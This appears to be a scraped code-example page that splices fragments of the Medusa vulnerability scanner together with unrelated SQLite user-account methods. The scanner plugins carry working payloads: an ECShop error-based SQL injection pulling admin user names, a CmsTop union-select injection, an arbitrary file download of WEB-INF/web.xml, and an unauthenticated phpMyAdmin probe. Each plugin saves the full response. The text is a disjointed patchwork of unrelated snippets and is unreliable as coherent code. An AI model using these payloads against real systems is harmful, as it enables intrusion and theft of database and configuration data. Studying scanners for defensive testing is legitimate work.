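            Medusa = "{}存在EasyTalkSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand the response and the caller's kwargs to the details writer.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Result file is named after the URL; Medusa is the report text.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() instead of "+" so the handler cannot raise a second
        # TypeError when Url was not supplied or the plugin name is None.
        ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url), e)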
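def medusa(**kwargs) -> None:
    """Check whether a BT panel host exposes phpMyAdmin without authentication.

    The URL's port is replaced with 888 and ``/pma/`` is requested. The
    target is reported when the status is 200 and the body contains
    ``phpMyAdmin``, ``sql`` and ``New``.

    Keyword Args:
        Url: Base URL of the target.
        Headers: Header dict sent with the request.
        Proxies: Proxy mapping handed to ``requests``.
    """
    url = kwargs.get("Url")  # target base URL
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    url = PortReplacement(url, 888)
    try:
        payload = '/pma/'
        payload_url = url + payload
        # verify=False turns off TLS certificate validation for this request.
        resp = requests.get(payload_url, headers=Headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        # All three strings must be present before the page is treated as an
        # open phpMyAdmin instance.
        if code == 200 and all(mark in con for mark in ("phpMyAdmin", "sql", "New")):
            Medusa = "{}存在宝塔面板未授权访问phpMyAdmin数据库漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand the response and the caller's kwargs to the details writer.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Result file is named after the URL; Medusa is the report text.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() instead of "+" so the handler cannot raise a second
        # TypeError when the URL or the plugin name is None.
        ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url), e)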
Beispiel #21
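 def __init__(self):
     """Open the project database and make sure ``OriginalProxyData`` exists.

     The connection and cursor are kept on ``self.con`` and ``self.cur``.
     A failure while creating the table is logged through ``ErrorLog`` and
     does not stop construction.
     """
     self.con = sqlite3.connect(GetDatabaseFilePath().result())
     # Cursor on the connection that was just opened.
     self.cur = self.con.cursor()
     try:
         # IF NOT EXISTS: a plain CREATE TABLE raised "table already exists"
         # on every construction after the first, filling the error log and
         # hiding real schema errors.
         self.cur.execute(
             "CREATE TABLE IF NOT EXISTS OriginalProxyData ("
             "rid INTEGER PRIMARY KEY, "
             "uid TEXT NOT NULL, "
             "oid TEXT NOT NULL, "
             "creation_time TEXT NOT NULL, "
             "url TEXT NOT NULL, "
             "request_headers TEXT NOT NULL, "
             "request_date TEXT NOT NULL, "
             "request_method TEXT NOT NULL, "
             "issue_task_status TEXT NOT NULL)")
     except Exception as e:
         ErrorLog().Write(
             "Web_WebClassCongregation_OriginalProxyData(class)_init(def)",
             e)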
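 def UpdateAvatar(self, **kwargs: str) -> bool:
     """Store a new avatar path for one user.

     Keyword Args:
         uid: User whose row is updated.
         avatar: New avatar path.

     Returns:
         True when at least one row was updated; False when no row matched,
         an argument is missing, or the statement raised.
     """
     Uid = kwargs.get("uid")
     Avatar = kwargs.get("avatar")
     UpdateTime = str(int(time.time()))  # modification time, epoch seconds
     try:
         if Uid is None or Avatar is None:
             return False
         # Parameterised statement: values are bound, not spliced into SQL.
         self.cur.execute("""UPDATE UserInfo SET avatar = ?, avatar_update_time = ? WHERE uid= ?""", (Avatar, UpdateTime, Uid,))
         # rowcount tells whether the WHERE clause matched a user.
         updated = self.cur.rowcount >= 1
         self.con.commit()
         return updated
     except Exception as e:
         ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_UpdateImgPath(def)", e)
         return False
     finally:
         # Close on every path; the connection used to stay open after an
         # exception or a missing argument.
         self.con.close()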
Beispiel #23
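def medusa(**kwargs) -> None:
    """Check one target for the ``download.jsp`` arbitrary file download issue.

    One GET asks ``download.jsp`` for ``/WEB-INF/web.xml``. The target is
    reported when the status is 200 and the body contains
    ``log4jConfigLocation``.

    The finding stores the full response body, i.e. the retrieved deployment
    descriptor, so the result files should be handled as sensitive data.

    Keyword Args:
        Url: Base URL of the target.
        Headers: Header dict sent with the request.
        Proxies: Proxy mapping handed to ``requests``.
    """
    url = kwargs.get("Url")  # target base URL
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload = "/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml"
        payload_url = url + payload

        # verify=False turns off TLS certificate validation for this request.
        resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('log4jConfigLocation') != -1:
            Medusa = "{}存在汇思软件任意文件下载漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand the response and the caller's kwargs to the details writer.
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()
            # Result file is named after the URL; Medusa is the report text.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # format() instead of "+" so the handler cannot raise a second
        # TypeError when Url was not supplied or the plugin name is None.
        ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(_, url), e)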
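 def UpdateKey(self, **kwargs: str) -> bool:
     """Store a new key for one user.

     Keyword Args:
         uid: User whose row is updated.
         key: New key value.

     Returns:
         True when at least one row was updated; False when no row matched,
         an argument is missing, or the statement raised.
     """
     Uid = kwargs.get("uid")
     Key = kwargs.get("key")
     UpdateTime = str(int(time.time()))  # modification time, epoch seconds
     try:
         if Uid is None or Key is None:
             return False
         # Parameterised statement: values are bound, not spliced into SQL.
         self.cur.execute("""UPDATE UserInfo SET key = ? , key_update_time = ? WHERE uid= ?""", (Key, UpdateTime, Uid,))
         # rowcount tells whether the WHERE clause matched a user.
         updated = self.cur.rowcount >= 1
         self.con.commit()
         return updated
     except Exception as e:
         ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_UpdateKey(def)", e)
         return False
     finally:
         # Close on every path; the connection used to stay open after an
         # exception or a missing argument.
         self.con.close()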
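def medusa(**kwargs) -> None:
    """Probe one target for the SQL injection issue this plugin reports.

    Reads ``Url``, ``Headers`` and ``Proxies`` from ``kwargs``, requests the
    path held in ``payload`` and records a finding when the response body
    contains a fixed 32-character hex marker (presumably the value the
    ``md5(c)`` expression in the request yields - confirm).  Nothing is
    returned; findings and errors are handed to the project's writer and
    logger classes.

    NOTE(review): the whole response body is copied into the finding; the
    request also selects ``user_name``, so stored results may contain
    account data from the target and should be treated as sensitive.
    """
    url = kwargs.get("Url")  # target base URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload = "/ecshop/respond.php?code=alipay&subject=0&out_trade_no=%00′ and (select * from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,md5(c)) from ecs_admin_user limit 1))a from information_schema.tables group by a)b)"
        payload_url = url + payload

        # NOTE(review): verify=False disables TLS certificate validation, so
        # the response is not authenticated; presumably deliberate so hosts
        # with self-signed certificates can be checked - confirm.
        resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        # The status code is not part of the decision; only the marker is.
        if "4a8a08f09d37b73795649038408b5f33" in con:
            Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()  # persist the finding with the response
            # Also write the result to a file; url is passed as the target file name.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_group = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_group)
        # format() instead of "+": a missing "Url" (or a missing 'algroup'
        # entry) is None, and string concatenation would raise TypeError
        # from inside this handler and hide the original error.
        ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(plugin_group, url), e)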
 def UpdateToken(self,**kwargs:str)->bool:
     """Replace a user's token; return True when a row was updated, else False.

     Reads ``name`` and ``token`` from ``kwargs``.  If either is missing
     the method returns False without touching the database.  After the
     UPDATE runs, the change is committed and the connection is closed
     whether or not a row matched; on an exception the error is logged and
     False is returned.

     NOTE(review): the token is written exactly as received; if it is a
     bearer credential, anyone who can read the database file can reuse it.
     Whether it is hashed upstream is not visible here - confirm.
     """
     user_name, new_token = kwargs.get("name"), kwargs.get("token")
     changed_at = str(int(time.time()))  # modification time, epoch seconds as text
     if user_name is not None and new_token is not None:
         try:
             # Values are bound as parameters, never formatted into the SQL text.
             params = (new_token, changed_at, user_name)
             self.cur.execute("""UPDATE UserInfo SET token = ? , token_update_time = ? WHERE name= ?""", params)
             # Fewer than one affected row means no user had that name.
             succeeded = False if self.cur.rowcount < 1 else True
             self.con.commit()
             self.con.close()
             return succeeded
         except Exception as e:
             ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_UpdateToken(def)", e)
             return False
     return False
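 def __init__(self):
     """Open the SQLite database and make sure the UserOperationLog table exists.

     The database path comes from ``GetDatabaseFilePath().result()``.  A
     failure while creating the table is logged and otherwise ignored, so
     construction itself does not raise for that reason.

     NOTE(review): the ``header`` and ``post_date`` columns presumably hold
     request headers and POST bodies.  If so, rows can contain cookies,
     tokens or passwords in clear text - confirm what the writer stores and
     restrict who can read the database file.
     """
     self.con = sqlite3.connect(GetDatabaseFilePath().result())
     # Cursor on the connection opened above.
     self.cur = self.con.cursor()
     try:
         # IF NOT EXISTS: a plain CREATE TABLE raises once the table is
         # there, so every construction after the first wrote a spurious
         # entry to the error log and buried genuine failures.
         self.cur.execute(
             "CREATE TABLE IF NOT EXISTS UserOperationLog"
             " (id INTEGER PRIMARY KEY,"
             " uid TEXT NOT NULL,"
             " request_api TEXT NOT NULL,"
             " creation_time TEXT NOT NULL,"
             " header TEXT NOT NULL,"
             " request_ip TEXT NOT NULL,"
             " request_method TEXT NOT NULL,"
             " request_url TEXT NOT NULL,"
             " post_date TEXT NOT NULL)")
     except Exception as e:
         ErrorLog().Write(
             "Web_WebClassCongregation_UserOperationRecord(class)_init(def)",
             e)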
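 def ForgetPassword(self,**kwargs):
     """Set a new password for the user matching ``name`` and ``email``.

     Reads ``name``, ``new_passwd`` and ``email`` from ``kwargs``.  Returns
     True when a row was updated and False otherwise (no matching user, a
     missing argument, or a database error, which is logged).  The
     connection is closed after the attempt, as in the original code.

     NOTE(review): the only check made here is that name and email match a
     row.  Proof that the requester controls the account (for example a
     one-time code sent to that address) has to be enforced by the caller;
     it is not visible in this method.  ``new_passwd`` is stored exactly as
     received - presumably already hashed upstream; confirm.
     """
     Name = kwargs.get("name")
     NewPasswd = kwargs.get("new_passwd")
     Email = kwargs.get("email")
     UpdateTime = str(int(time.time()))  # modification time, epoch seconds as text
     # Same argument check as the sibling Update* methods.  Without it a
     # missing new_passwd is bound as NULL and, where the schema permits,
     # overwrites the stored password for a matching name/email.
     if Name is None or NewPasswd is None or Email is None:
         self.con.close()
         return False
     try:
         # Values are bound as parameters, never formatted into the SQL text.
         self.cur.execute("""UPDATE UserInfo SET passwd = ? , passwd_update_time = ? WHERE name= ? and email=?""",
                          (NewPasswd, UpdateTime, Name, Email,))
         # rowcount tells whether any row matched name and email.
         updated = self.cur.rowcount >= 1
         self.con.commit()
         self.con.close()
         return updated
     except Exception as e:
         ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_ForgetPassword(def)", e)
         return False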
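def medusa(**kwargs)->None:
    """Probe one target for the SQL injection issue this plugin reports.

    Reads ``Url``, ``Headers`` and ``Proxies`` from ``kwargs``, requests the
    path held in ``payload`` and records a finding when the response body
    contains a fixed 32-character hex marker (presumably the value the
    ``md5(c)`` expression in the request yields - confirm).  Nothing is
    returned; findings and errors are handed to the project's writer and
    logger classes.

    NOTE(review): the whole response body is copied into the finding, so
    stored results should be treated as sensitive data.
    """
    url = kwargs.get("Url")  # target base URL supplied by the caller
    Headers = kwargs.get("Headers")  # request headers supplied by the caller
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the caller
    try:
        payload = "/?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select md5(c) from cmstop_admin where departmentid=2 limit 0,1;#"
        payload_url = url + payload

        # NOTE(review): verify=False disables TLS certificate validation, so
        # the response is not authenticated; presumably deliberate so hosts
        # with self-signed certificates can be checked - confirm.
        resp = requests.get(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        # The status code is not part of the decision; only the marker is.
        if '4a8a08f09d37b73795649038408b5f33' in con:
            Medusa = "{}存在CmsTopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp, **kwargs).Write()  # persist the finding with the response
            # Also write the result to a file; url is passed as the target file name.
            WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin_group = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_group)
        # format() instead of "+": a missing "Url" (or a missing 'algroup'
        # entry) is None, and string concatenation would raise TypeError
        # from inside this handler and hide the original error.
        ErrorLog().Write("Plugin Name:{} || Target Url:{}".format(plugin_group, url), e)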
 def Write(self,**kwargs):
     """Insert one row into ActiveScanList and return its row id.

     Reads ``uid``, ``url``, ``proxy``, ``status``, ``module`` and
     ``process`` from ``kwargs``; absent keys are bound as NULL.  The row is
     committed and the connection closed before returning.  Returns the new
     row id on success and None when the insert fails (the error is logged).
     """
     created_at = str(int(time.time()))  # creation time, epoch seconds as text
     # redis_id is stored empty at first and filled in later.
     row = (
         kwargs.get("uid"),
         kwargs.get("url"),
         created_at,
         kwargs.get("proxy"),
         kwargs.get("status"),
         kwargs.get("process"),
         kwargs.get("module"),
         "",
     )
     try:
         # Values are bound as parameters, never formatted into the SQL text.
         self.cur.execute("INSERT INTO ActiveScanList(uid,url,creation_time,proxy,status,process,module,redis_id)\
         VALUES (?,?,?,?,?,?,?,?)", row)
         # Primary-key value of the row just inserted (the active scan id).
         new_scan_id = self.cur.lastrowid
         self.con.commit()
         self.con.close()
     except Exception as e:
         ErrorLog().Write("Web_WebClassCongregation_ActiveScanList(class)_Write(def)", e)
         return None
     return new_scan_id